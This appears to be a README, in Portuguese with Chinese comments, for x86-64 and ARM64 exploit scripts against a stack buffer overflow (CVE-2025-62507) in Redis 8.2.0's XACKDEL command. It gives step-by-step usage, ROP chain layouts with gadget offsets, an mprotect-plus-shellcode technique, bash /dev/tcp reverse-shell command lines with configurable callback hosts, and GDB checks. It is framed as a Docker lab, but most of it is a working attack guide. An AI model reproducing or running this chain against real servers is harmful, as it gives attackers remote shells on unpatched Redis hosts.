Scripts de Exploit — CVE-2025-62507
Estrutura de diretórios
scripts/
├── exploit_x86.py # x86-64 ROP exploit
├── exploit_arm64.py # ARM64 (AArch64) ROP exploit
└── gdb_with_symbols.sh # GDB 调试辅助脚本
Resumo da vulnerabilidade
| Item | Descrição |
|---|
| CVE | CVE-2025-62507 |
| Tipo de vulnerabilidade | Estouro de buffer de pilha (Stack Buffer Overflow) |
| Componente afetado | Função xackdelCommand do Redis 8.2.0 |
| Forma de disparo | Comando XACKDEL com mais de 52 streamIDs |
| Técnica de exploração | Cadeia ROP → mprotect para liberar permissão de execução na pilha → shellcode com reverse shell |
| Dependências | Python 3 (apenas biblioteca padrão, sem instalação adicional) |
Pré-requisitos
- Ambiente alvo: contêiner Docker ou host executando Redis 8.2.0 (versão vulnerável)
- Terminal de escuta: a máquina atacante precisa iniciar
nc -lvnp 4444 antecipadamente para aguardar o reverse shell
- Permissão para obter endereços: é necessário conseguir ler
/proc/<PID>/maps do processo alvo (permissão root)
- Python 3: ambos os scripts de exploit usam apenas a biblioteca padrão (
socket, struct, time, sys)
Início rápido
1. Iniciar o contêiner Redis vulnerável
# 在项目根目录执行
docker compose -f docker-compose-vulnerable.yml up -d
# 确认容器运行
docker ps | grep redis-cve-2025-62507
2. Obter os endereços de memória críticos
REDIS_PID=$(docker top redis-cve-2025-62507 | grep redis-server | grep -v bash | awk '{print $2}')
# x86-64 地址获取
REDIS_BASE=$(sudo cat /proc/$REDIS_PID/maps | grep -w redis-server | head -1 | cut -d'-' -f1)
LIBC_BASE=$(sudo cat /proc/$REDIS_PID/maps | grep libc.so | head -1 | cut -d'-' -f1)
STACK_ADDR=$(sudo cat /proc/$REDIS_PID/maps | grep -w stack | head -1 | cut -d'-' -f1)
echo "REDIS_BASE=$REDIS_BASE LIBC_BASE=$LIBC_BASE STACK_ADDR=$STACK_ADDR"
Nota: os endereços mudam após cada reinicialização do contêiner (ASLR), sendo necessário obtê-los novamente.
3. Iniciar o listener do reverse shell
# 在宿主机另开一个终端
nc -lvnp 4444
4. Executar o exploit
# x86-64
python3 scripts/exploit_x86.py 0x$REDIS_BASE 0x$LIBC_BASE 0x$STACK_ADDR
# ARM64 (Docker QEMU 固定地址, ASLR=OFF)
python3 scripts/exploit_arm64.py 0xaaaaaaaa0000 0xfffff7630000 0xfffffffff7e0 [rev_host] [rev_port] [target]
exploit_x86.py — Exploit ROP x86-64
Uso
python3 scripts/exploit_x86.py <redis_base> <libc_base> <stack_addr>
Descrição dos parâmetros
Arquitetura da cadeia ROP
52 个填充 ID (1-1)
│
▼
ID#53 overflow ──→ pop rdi; ret (redis + 0x82327)
ID#54 ──→ pop rsi; ret (redis + 0x86416)
ID#55 ──→ pop rdx; ret (redis + 0xba1e2)
ID#56 ──→ mprotect() (libc + 0x1019e0)
ID#57 ──→ call rsp (redis + 0x9486d)
ID#58+ ──→ shellcode ──→ system("/bin/bash -c '...'")
Offsets dos gadgets (redis-server-8.2.0)
Personalizar o endereço do reverse shell
A variável reverse_shell_cmd é definida na linha 149 do script, com o seguinte valor padrão:
reverse_shell_cmd = "/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'"
Como modificar: edite exploit_x86.py, localize a linha reverse_shell_cmd e substitua o IP e a porta:
Para alterar a porta: substitua o 4444 em /dev/tcp/<IP>/4444 pela porta real de escuta.
stack_page é calculado dinamicamente a partir do parâmetro stack_addr: (stack_addr + 0x1000) & ~0xFFF, garantindo que a janela do mprotect cubra a região da pilha onde o shellcode está. Se o layout da pilha estiver anormal, ajuste de acordo.
exploit_arm64.py — Exploit ROP ARM64
Uso
python3 scripts/exploit_arm64.py <redis_base> <libc_base> <stack_addr> [rev_host] [rev_port] [target]
Descrição dos parâmetros
Nota ARM64: stack_addr é o valor de SP na entrada de xackdelCommand (não é o endereço inicial do segmento [stack]!). static_ids[0] = stack_addr - 0x310, e o x30 salvo de call() está em stack_addr + 8 (ou seja, static_ids[49].seq).
Arquitetura da cadeia ROP
49 个填充 ID (1-1)
│
▼
ID#49-58 call() 尾声帧 (10 IDs) — 覆盖 call() 保存的寄存器和局部变量
│ #49: saved x29 (dummy) + x30 (G5)
│ #50: saved x19/x20, #51: saved x21(=0)/x22
│ #52: x23/x24, #53: x25/x26, #54: x27/x28
│ #55-58: 局部变量 (设为 0)
│
▼ call() ret → SP = stack_addr + 0xa0
│
ID#59-61 Step 1: G5 (redis + 0x1a4d40) x0=writable, → G_SET_X2_7
ID#62-65 Step 2: G_SET_X2_7 (redis + 0x1d7a84) w2=7, → LDR_X1_SIDELOAD
ID#66-67 Step 3: LDR_X1_SIDELOAD (libc + 0x34ab4) x1=0x1000, → G5
ID#68-70 Step 4: G5 (redis + 0x1a4d40) x19=mprotect, → MOV_X3_X19
ID#71-93 Step 5: MOV_X3_X19 (redis + 0x2948b0) x3=mprotect, → LDR_X0_CLEAN
ID#94-95 Step 6: LDR_X0_CLEAN (libc + 0x6ae40) x0=stack_page, → BLR_X3
ID#96-98 Step 7: BLR_X3 (redis + 0x92bc4) call mprotect → shellcode
ID#99+ shellcode — system("/bin/bash -c 'reverse_shell_cmd'")
Importante: o epílogo de call() restaura x19-x28 da pilha e lê diversas variáveis locais antes de ret. Os IDs #49-58 precisam conter valores seguros, caso contrário o epílogo falhará durante a execução. A cadeia ROP começa no ID#59 (posição de SP após o ret de call()).
Offsets dos gadgets (redis-server-8.2.0-arm64)
Offsets dos gadgets (libc.so.6-arm64, dentro do contêiner Docker)
Nota: LDR_X1_SIDELOAD tem o efeito colateral mov x0, x1; após a execução, x0 será sobrescrito por x1! Será necessário redefinir x0 posteriormente com G5 ou LDR_X0_CLEAN.
Personalizar o endereço do reverse shell
reverse_shell_cmd é construído dinamicamente na função build_exploit_arm64(), com base nos parâmetros rev_shell_host e rev_shell_port:
reverse_shell_cmd = f"/bin/bash -c '/bin/bash -i >& /dev/tcp/{rev_shell_host}/{rev_shell_port} 0>&1'"
Método recomendado: especificar o endereço do reverse shell por meio de argumentos de linha de comando:
# 默认: 192.168.1.1:4444 → 192.168.1.129:6379
python3 scripts/exploit_arm64.py 0xaaaaaaaa0000 0xfffff7630000 0xfffffffff7e0
# 自定义反弹地址和端口:
python3 scripts/exploit_arm64.py 0xaaaaaaaa0000 0xfffff7630000 0xfffffffff7e0 10.0.0.1 9999 10.0.0.100
# ^^^^^^^^ ^^^^ ^^^^^^^^^^
# rev_host rev_port target
Modificação direta: edite exploit_arm64.py, alterando os valores padrão dos parâmetros da função exploit():
Usar gdb_with_symbols.sh
# 获取 Redis PID
REDIS_PID=$(docker top redis-cve-2025-62507 | grep redis-server | grep -v bash | awk '{print $2}')
# 启动 GDB 并自动设置断点
./scripts/gdb_with_symbols.sh $REDIS_PID
O script automaticamente:
- Carrega a tabela de símbolos de
binaries/redis-server-8.2.0
- Define um breakpoint em
xackdelCommand
- Define um breakpoint em
mprotect
- Define um breakpoint em
system
Posições-chave dos breakpoints
# xackdelCommand 入口 — 观察正常栈布局
break xackdelCommand
# 第 53 个 streamID 写入后 — 观察返回地址被覆写
# (在循环体内设置条件断点)
# mprotect 调用前 — 验证参数 rdi/rsi/rdx
break mprotect
# system 调用前 — 验证 rdi 指向命令字符串
break system
Verificar etapas-chave do exploit
# 1. 进入 xackdelCommand 后,找到 static_ids 数组位置
(gdb) x/10gx $rbp - 0x340 # x86-64
(gdb) x/10gx $sp # ARM64
# 2. mprotect 断点触发时,验证参数
(gdb) info registers rdi rsi rdx # x86-64
(gdb) info registers x0 x1 x2 # ARM64
# 预期: rdi/x0=stack_page, rsi/x1=0x20000, rdx/x2=7
# 3. mprotect 返回后,检查 RAX/X0 (=0 表示成功)
(gdb) finish
(gdb) info registers rax # x86-64
(gdb) info registers x0 # ARM64
# 4. 观察 shellcode 执行
(gdb) x/20i $rsp # x86-64: call rsp 后的 shellcode
(gdb) x/20i $x30 # ARM64: 跳转前的返回地址
Solução de problemas
Limpeza do ambiente
# 停止并删除容器
docker compose -f docker-compose-vulnerable.yml down
Referência de arquivos